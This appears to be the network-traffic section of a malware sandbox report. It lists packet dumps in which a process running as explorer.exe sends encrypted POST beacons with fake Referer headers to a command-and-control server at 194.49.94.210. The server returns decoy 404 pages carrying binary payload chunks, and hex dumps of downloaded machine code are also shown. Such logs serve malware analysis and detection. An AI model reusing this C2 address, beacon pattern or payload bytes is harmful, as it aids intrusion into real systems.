Nov 18, 2023 10:03:24.835890055 CET	67197	IN	Data Raw: 07 01 48 8b 0d d7 15 07 01 48 39 d9 73 37 bf 05 00 00 00 48 8d 35 a6 7b 83 00 e8 a1 fb 04 00 48 89 0d ba 15 07 01 83 3d 53 9c 0c 01 00 75 09 48 89 05 9a 15 07 01 eb 0d 48 8d 3d 91 15 07 01 90 e8 bb f1 06 00 48 89 1d 8c 15 07 01 48 8d 4b fb 48 c1 Data Ascii: HH9s7H5{H=SuHH=HHKHHDfDH<HHRHH[ H4Hv0LM@@LMIPLMR`LM[pL$M$L,M=fuHBHHNHT!ML&HH.
Nov 18, 2023 10:03:24.835926056 CET	67199	IN	Data Raw: 01 d0 89 44 24 08 89 54 24 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 44 24 08 01 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 59 48 83 ec 20 48 89 6c 24 18 48 8d 6c 24 18 48 8b 48 08 Data Ascii: D$T$D$I;fvYH Hl$Hl$HHHH0fH9Ku-HxH9{u#x@8{uxf@8{uHHO1Hl$H HD$H\$rHD$H\$I;fH(Hl$ Hl$ HD$0H\$81HL$HH\$8HD$0H
Nov 18, 2023 10:03:24.835963964 CET	67200	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 c1 48 d1 e8 48 ba 55 55 55 55 55 55 55 55 48 21 d0 48 21 ca 48 8d 0c 02 48 89 ca 48 c1 e9 02 48 bb 33 33 33 33 33 33 33 33 48 21 d9 48 21 d3 48 01 d9 48 89 ca 48 c1 e9 04 48 01 d1 Data Ascii: HHHUUUUUUUUH!H!HHHH33333333H!H!HHHHHH!HHHHHHHH HL$@M;fMH@H$8H$8H$HH~
Nov 18, 2023 10:03:24.836000919 CET	67201	IN	Data Raw: e8 09 c1 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb bd cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 52 02 00 00 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 7c 24 68 31 d2 Data Ascii: HD$H\$I;fRHHHl$@Hl$@HD$PH\|$h1E1MHDiFCML9IAAEEHEEHEEH1E1L^EiD,0G,LI9~H9wH\$XHD$PLD$8HL$`H\|$hDT$T
Nov 18, 2023 10:03:24.836055994 CET	67203	IN	Data Raw: c4 e2 06 00 48 89 f8 48 89 d9 e8 79 e2 06 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 0f 1f 40 00 e8 db bb 06 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 a2 fd ff ff cc cc 48 89 44 24 08 31 c9 31 d2 eb Data Ascii: HHyHD$H\$HL$H\|$ @HD$H\$HL$H\|$ HD$114LB@8IDHH9HHD$11<LF@8IDHH9H=<tH?H
Nov 18, 2023 10:03:24.836091995 CET	67204	IN	Data Raw: cc cc 80 3d 03 8b 0c 01 01 74 05 e9 d2 06 00 00 48 8b 74 24 08 48 8b 5c 24 10 8a 44 24 20 4c 8d 44 24 28 e9 5a fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 80 3d c3 8a 0c 01 01 74 05 e9 f2 06 00 00 48 8b Data Ascii: =tHt$H\$D$ LD$(Z=tHt$H\$D$LD$ HH@=hthH@oooVo_of oo ov0o0ftftftftffffH@
Nov 18, 2023 10:03:25.134943008 CET	67207	IN	Data Raw: 08 48 8b 54 24 10 4c 8b 44 24 20 48 8b 44 24 28 49 89 fa 4c 8d 5c 24 38 e9 df fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 7c 24 08 48 8b 54 24 10 4c 8b 44 24 18 48 8b 44 24 20 49 89 Data Ascii: HT$LD$ HD$(IL\$8H\|$HT$LD$HD$ IL\$(fHnf`f`fpH\|THH HDoftfu%HH9rHoftfuIH)HI8HtHFf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	194.49.94.210	80	192.168.2.4	49737	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:23.389257908 CET	221	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://odndjqveglvvb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 197 Host: 194.49.94.210
Nov 18, 2023 10:02:23.389302969 CET	221	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 2b af a2 d5 f3 c9 38 df 28 fc d8 50 b8 29 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP+8(P)[^Ee31)HpYz!pXm>O62!Jo&:>G!/Wkv2m+#_8{pE/aV`uf'BqG!
Nov 18, 2023 10:02:23.699565887 CET	221	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 04 00 00 00 2d 20 5c 6e Data Ascii: - \n
Nov 18, 2023 10:02:23.702423096 CET	222	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qmebwxpdbgoa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: 194.49.94.210
Nov 18, 2023 10:02:23.702471972 CET	222	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a2 d5 f3 c9 38 df 28 fc f6 35 99 7c Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(5\|TT!z9X8p+]f.Hl~o;,a/c,;
Nov 18, 2023 10:02:24.004362106 CET	223	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:23 GMT Server: Apache/2.4.41 (Ubuntu) Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 33 37 38 30 32 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 2b 3c 32 9d b1 fb 9e 1a 14 f1 c9 e9 21 0c f3 1a a3 04 13 3c ff 8f d7 e4 d3 68 7a 4d 8a a4 75 b4 33 d5 55 21 6f 40 51 f8 43 ab 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 37 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 33 40 a5 ca 75 83 e8 b9 5f 45 22 18 b1 e3 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 72 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 70 8a ca e8 b1 55 84 3a a6 93 49 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 90 db e1 47 e4 fc 09 53 e2 99 df 87 b4 6b d6 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 a1 69 c2 75 6e fd 29 2a 4b db 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 a8 b7 6a 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 a6 de 2d 6e a4 c4 03 8d e4 24 bd 70 d8 3c 3f 43 f2 47 c8 cc 03 dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 6c 30 cf eb c4 5e b5 1b 8a 42 2e b9 bc 44 79 c7 c0 b4 40 ca cc 01 45 d9 ad 10 31 3e b9 c0 76 b7 af 2e 8c 2b ca 12 d3 87 40 e0 25 d0 9e 54 de de 1a cc 5f 96 29 6d 93 55 7b 17 60 27 f2 2c 9e 4b 86 3d cb 5a 48 d2 79 1a 59 9b a1 aa 17 06 72 e1 3a 91 ac 16 79 7c 22 1b c8 59 2b 18 62 a1 35 e2 59 eb 6f e2 9c 5f 06 ca 5a 04 93 75 1e e4 0d 5c af 29 4b bf da 02 40 48 ac 86 cb 79 c1 f4 bc 5d 3f ff a3 ff 68 b7 d3 44 96 73 6d 51 c0 d7 c9 c2 91 5a 8c 1e 7e 2f 70 b8 00 a6 29 a0 de 42 a5 aa 2f f5 39 da 60 58 56 4f 12 a8 b9 ac 41 7c 61 95 f5 53 5e 3f 93 28 f7 af 74 d4 20 76 6c 74 45 ff 56 07 d5 e6 e4 86 7a fc 42 dd 06 89 d2 43 b2 dc 0c 54 1a a0 28 34 4c a2 e4 71 11 69 1f 10 35 fe ef f7 f5 79 61 cd f4 9a ac 0b c6 10 9b 42 1e 80 52 7e fd 56 c6 7c f1 d8 97 0a a8 af bb 4b b0 db f5 9d fd 77 7d 67 8a 21 89 6c d1 65 d4 32 67 9e 2e 24 4f 73 ab a3 86 48 5a ac 99 02 23 4a 67 ac f9 6a 37 4f b5 0d 9f 0e 91 08 7b b1 4d df d2 d0 95 ce 8d 3e 9c 16 c4 18 94 8c 42 63 aa be 6f a9 19 0e d2 e8 a9 8a 68 4d 59 e3 47 6c 76 e8 9b cf 19 be a1 f3 f8 84 ec 35 ba 16 f5 d6 fc 01 e4 0f 3b e5 a0 09 7e bf f7 15 9b 34 5e 74 47 23 fc fb 0f 0d fa 28 31 db 38 b7 3d 24 d1 f3 b1 f1 eb 0b 7d f1 b0 d6 e4 2c 4b ac 41 41 9b 58 68 99 cb 70 25 20 69 ca 85 ea 24 ab 11 c8 64 9d d9 2a cd 29 1e a5 7f 44 3b bf 29 02 9f 52 ec 37 20 09 0d 18 88 31 af d4 87 9d 7a c0 5a 53 22 c3 ee 55 d4 e5 bb cd 1d ce 17 ed a6 e5 06 7b b2 c5 db 28 21 be d9 8b f5 Data Ascii: 37802}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rf+<2!<hzMu3U!o@QCF@3sPu-\T+7$A/}t<KL<Qrk5c@]V3@u_E"svaaAJ,r{p7xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`pU:IO!%LQ2u6xQyGSk@7$lRN9LFtp>ciun)Kd!b~(OYD6Hv}j;]t-n$p<?CG3YF w0+.2l0^B.Dy@E1>v.+@%T_)mU{`',K=ZHyYr:y\|"Y+b5Yo_Zu\)K@Hy]?hDsmQZ~/p)B/9`XVOA\|aS^?(t vltEVzBCT(4Lqi5yaBR~V\|Kw}g!le2g.$OsHZ#Jgj7O{M>BcohMYGlv5;~4^tG#(18=$},KAAXhp% i$d)D;)R7 1zZS"U{(!
Nov 18, 2023 10:02:24.004383087 CET	225	IN	Data Raw: 22 92 0c 4e 7b 0c c7 51 7f 2f 92 c7 73 29 e2 5e ca dd 7a f5 fb ab 2b d9 96 80 48 c5 c5 21 1b b8 47 0f 6b fe 7f 02 2a 1f ff d0 6d 84 cb db 43 52 49 db 2b 03 06 a9 5a 29 1e 6b d6 d6 6d c1 3a ae 8a 19 ea 80 75 2e ff 00 05 aa 75 61 51 e3 ef 0a 44 a0 Data Ascii: "N{Q/s)^z+H!Gk*mCRI+Z)km:u.uaQD2o?zo$Sd3l./v}t ;d5%kwOT#I.\__y%uCAn3#?`IzET2Epdv}odd9hs8/Jm{w8L~:/4r#'\e
Nov 18, 2023 10:02:24.004403114 CET	226	IN	Data Raw: 7e ae 18 f5 85 5d d0 80 db 60 ef 56 cf 55 07 cb cc a9 39 f9 b5 6d 70 3c 75 c1 ae 85 43 91 10 a9 68 d0 81 ff e0 34 5d 08 9f b7 93 27 57 fe d2 ab 3c 1d 53 2c f1 49 eb 1c 14 d4 01 2c 6d 46 eb 80 fb df 1d 74 a3 dc c2 78 b9 6d 55 04 80 e9 d4 77 ee e1 Data Ascii: ~]`VU9mp<uCh4]'W<S,I,mFtxmUwo:JP,p+\,Zp+A$[ZTMRgLA6?4NcGzlqD}2v$372W$'u'_@uy'9^d')-?gmr7MD0[E
Nov 18, 2023 10:02:24.004472971 CET	227	IN	Data Raw: cb 92 72 14 8f ef 89 63 8a bd ad db c7 9d 12 48 6b a2 e3 a2 ea e8 c8 2f 45 26 68 e3 df cc 96 dc 73 a5 28 bf c7 97 93 e0 2a 58 49 50 0e 63 bd 78 fa 9c 33 f0 4b d0 aa f3 b9 e8 4c 35 bb fc 8d 7b a9 90 ed e7 48 47 cd 78 6f cc 37 28 3d 82 97 5f b4 7a Data Ascii: rcHk/E&hs(XIPcx3KL5{HGxo7(=_zXCn^NjyxViS`YAiI/7TBz;iJd-B-1Rm96Wr7EBwYD\_9&4F\xC
Nov 18, 2023 10:02:24.004491091 CET	229	IN	Data Raw: 18 47 3c 32 6c c8 92 2a 66 aa 04 e5 2d 49 b9 83 3f 98 2d aa 08 19 f5 23 a4 7e b3 b4 54 ad 2f 27 8d 43 aa 58 d8 f8 ce b8 b3 50 7d 1f 35 28 7b e3 85 6f 76 55 a8 53 08 eb 07 ac 58 5e f8 ae 4d df bd 6c 00 12 3a b6 e7 43 1d 82 50 ce 1f fa 3f f1 f0 9a Data Ascii: G<2lf-I?-#~T/'CXP}5({ovUSX^Ml:CP??Im6nXrsH$X6^{7=%PH\|E2T2Pd*XAc O+"y<CGV)8(rZr\| gA~QI!GCM+?Vt5i\|9Q~r
Nov 18, 2023 10:02:24.004508972 CET	230	IN	Data Raw: 5a fb 3e e8 f7 c8 0d 09 99 08 ab 83 89 0d 4a c6 b1 6b 9c 8c e2 62 4c 58 a9 eb 6b a4 16 2f d7 db bd df c8 58 ca 3c de 20 49 ba 0b 4d 76 10 2d b6 24 3f 6e 82 9c 27 4b 4f c1 1c e2 f2 a9 cf e2 a3 11 0e 2a 10 c5 1f 4a a5 ba 46 b7 a5 17 75 3d e4 2d 34 Data Ascii: Z>JkbLXk/X< IMv-$?n'KOJFu=-4)JND">@ME=EYbWhmYGV]:ta$/YWz2c%/r6y'F&UQq$1G^5;QtK=Y^s
Nov 18, 2023 10:02:24.004527092 CET	231	IN	Data Raw: 50 65 da 0e cd ef 3f 26 eb 33 0d 4f 89 e7 b2 8c ac 78 9c a9 7d 5e dd e0 28 50 f4 16 29 04 a7 61 8f aa f9 9e d2 5b e5 1a 87 4c c5 0d c2 28 ef fd d8 6d ab 9d 13 b9 82 fd 1a be f0 dc 83 8e c6 68 d0 a2 ac d6 9f 98 4d 04 3a 22 66 eb b5 1c fb cb 01 65 Data Ascii: Pe?&3Ox}^(P)a[L(mhM:"fe)Y2\|1!27-s]Y iQf9QhTNfQ\|k%0`+#06sZAx'/6Knx?V+-z%T?X:#yVIP=R4J@
Nov 18, 2023 10:02:24.004543066 CET	233	IN	Data Raw: 7f ab 77 7c 52 3f 72 8a 76 a1 59 d7 02 e7 78 5f ab 41 7f 7b 2f 5c 73 68 06 13 6f 88 75 a2 e5 10 30 6f 35 a8 9c ca 29 42 f0 fa 7c 25 27 07 16 c4 b3 df fe 70 1c bd c1 31 c9 9c 88 cf a2 01 6a 2f 18 75 99 9d 34 5f 0d 4c cb 55 05 9d be c4 bc 4d 69 ad Data Ascii: w\|R?rvYx_A{/\shou0o5)B\|%'p1j/u4_LUMieB{\or^M AO@JyqN?\|HxM,!Bp9!L0 fa<e$[U> , (>$hB={P^:(
Nov 18, 2023 10:02:24.004560947 CET	234	IN	Data Raw: 78 5b 82 a6 6d 59 52 48 77 69 f1 d4 73 8d 99 96 9c 0e d0 1d a6 6f f7 d5 79 41 5f c3 59 f3 a7 df 19 c8 1d b8 9f 35 ca 9a 97 0e 08 8c bb 07 5c a9 d4 b7 64 7f e1 c0 1a cb 26 ef d5 f2 f7 81 16 17 ff 88 82 43 65 2b 88 43 61 f2 26 61 c3 fe 52 26 0a 56 Data Ascii: x[mYRHwisoyA_Y5\d&Ce+Ca&aR&Vj4(jkH=Z:)[{}N5<+gb)RQuD4$<wyx vP;XCUH@wRA:e*f:SvF?Cwb7]ye3t^9
Nov 18, 2023 10:02:24.004579067 CET	235	IN	Data Raw: 39 67 e9 20 ea 3a 0f 66 1a fc a1 7d c5 73 38 38 09 01 68 6f 65 f7 f6 0e d7 25 99 f2 f7 32 ad 11 34 8c cc 41 63 1c c1 df 68 16 8a 23 b3 1f 5d 9c 67 f9 cf 03 03 bc e5 54 87 75 74 dc 45 9b 7b 4e 71 24 9a a4 86 8e 24 1c dd fd 44 e3 8f b6 b4 c6 e3 e7 Data Ascii: 9g :f}s88hoe%24Ach#]gTutE{Nq$$DVpb%O-2&-I (5x[Dh:VdNx"PD~`83wj&.J`xoHvPIJK!AOiL_to)Fy_-C0h~'yw"h;
Nov 18, 2023 10:02:24.300873041 CET	237	IN	Data Raw: 52 a8 e7 fa 88 1a cf 56 93 d5 e4 d1 bd 33 e7 9d 74 ab e6 0c 12 95 94 af 48 74 7c 71 72 f3 83 55 50 35 86 f7 1e 48 f6 f9 5c 1b e1 3d a5 f4 3c 0a 40 b1 c5 cf 1c c5 46 b3 61 ea 95 aa b4 cd 7e 9c fa aa cc a7 16 57 63 71 9a 55 da 2e 9c 34 d5 59 4e cd Data Ascii: RV3tHt\|qrUP5H\=<@Fa~WcqU.4YN\7z?4sV(R$>ga[afw~nKhVUAvBQYb1T;aquo1);b].&/Y(Fcaf
Nov 18, 2023 10:02:25.302119017 CET	459	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rjroicjqqmgntlw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 365 Host: 194.49.94.210
Nov 18, 2023 10:02:25.302160978 CET	460	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a2 d5 f3 c9 39 df 28 fc fa 51 86 2a Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(Q*?^WJit{g@]Sw;3hP\/Oe1,xUG f8zl^a[AnnS\mPfC#EG}@sbD,b@x}ob-\|oy8=G2j%<n
Nov 18, 2023 10:02:25.605895042 CET	461	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:25.648957014 CET	461	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bhniqbswtnh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: 194.49.94.210
Nov 18, 2023 10:02:25.649039030 CET	461	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a3 d5 f3 c9 38 df 28 fc c9 42 ff 52 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(BRXVeVs2gc))`e3NtnlVP9`G1U!7A7twLCxUpH#=_!ap}^pz_
Nov 18, 2023 10:02:25.951236963 CET	462	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:25 GMT Server: Apache/2.4.41 (Ubuntu) Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 36 36 38 30 32 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 0d dd 66 e2 b1 fb 9e 1a 14 f1 c9 e9 21 0c d3 1b a3 04 13 3c fb 18 d3 e4 49 c1 7a 4d 8a a4 75 b4 e3 41 51 21 6f 40 51 f8 43 2b 43 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 82 32 97 24 41 7f fe b3 ae 2f 7d c7 74 f7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 b7 db a1 ca 70 83 e8 b9 5f c5 27 18 61 4f 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 7f 77 97 af a6 7b b2 be 0c f3 92 0f cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 40 1f ce e8 b1 55 84 3a a6 07 4d 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 40 77 e1 47 e4 7c 0c 53 e2 35 df 87 b4 c7 d2 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 c1 6c c2 75 6e fd 29 2a 5b de 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 5b ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 30 23 6e 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 5a 72 2d 6e 14 ec 06 8d e4 24 bf 70 01 3e 3f 43 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 58 df d2 60 2e 97 0f 21 e8 6e 3f cf 52 3c 50 b6 17 ef 96 b1 43 e7 42 21 dc 55 3f fc a7 17 d2 40 ed 83 a1 42 37 98 da f9 ec ef 27 e8 bd 8f f6 34 40 01 9c 24 e9 9d a6 b4 0b 0c 35 19 11 d5 ba 96 d3 78 c6 46 45 ad 08 20 03 3d 7c 38 fb 34 3a 80 37 93 33 25 74 a2 2f 62 97 48 82 46 2f 86 c5 20 2e f4 0b 11 10 4f 9b 54 0a 4b b2 22 c0 97 9b e6 81 99 c0 43 8c 37 af ec d4 21 3c 8e ed dc 8f 98 9c 0c e3 48 1d ad 88 0a 0b fa bb 31 a9 d1 dd a9 83 b3 a3 e6 06 23 20 7f d2 53 a7 9f 92 e0 f4 76 0d b5 23 7c 90 7c 32 60 ee 64 7c d0 9e 07 6f 2d 84 b6 e3 ee 4a fe 55 11 ea 2c 21 dc 45 c5 05 ec 1a 92 26 0c 70 a2 f1 51 18 21 7b 48 54 97 e3 cf 52 cc 93 a0 7c b4 e0 0d 65 7f f9 f6 4c 48 6a 06 e7 99 ba 95 eb e0 6d 08 bf 1e b0 c4 1e a2 ec 52 91 91 7d 32 af 5e 1a 8c 3a ab 58 fd 55 26 a3 f6 e5 ca 65 74 a8 96 de c7 f9 58 42 37 a0 1c 78 59 dc 87 89 a6 40 4e 3c fe 3b e9 03 b7 9e b4 fd 9a 00 f5 c7 6d 6d 00 e1 b9 35 68 d2 c9 c5 f3 03 6a 3a 6b 4a e3 f1 63 07 08 fd 58 ea bc f4 0d 3c e8 b7 dc 71 2c cb d3 72 32 52 d0 79 58 e7 17 86 6c c8 82 c9 b8 1c 47 aa 60 9b fc 10 d2 1e 55 33 7e 8d 35 7d e8 57 37 2a fd 4d d6 e6 a8 df 72 31 39 a5 80 26 7b 11 bf 2c bc c2 14 0f 14 ce 57 9b f8 d1 62 65 b5 74 df 0e 0d 49 39 b1 67 2e bb 89 19 5b b0 20 b5 e3 ce 7b ef d4 07 79 23 14 bc 52 8d a4 10 04 95 7e 18 cd 28 dd aa 6b ff 8e 31 cb 4a c9 e2 b5 18 d6 58 d7 45 29 5a 55 69 dd fb 7e 55 94 6f 78 8c 5a df 47 4c f3 f4 e6 ae 52 4a 9a 5d 1d e5 1e Data Ascii: 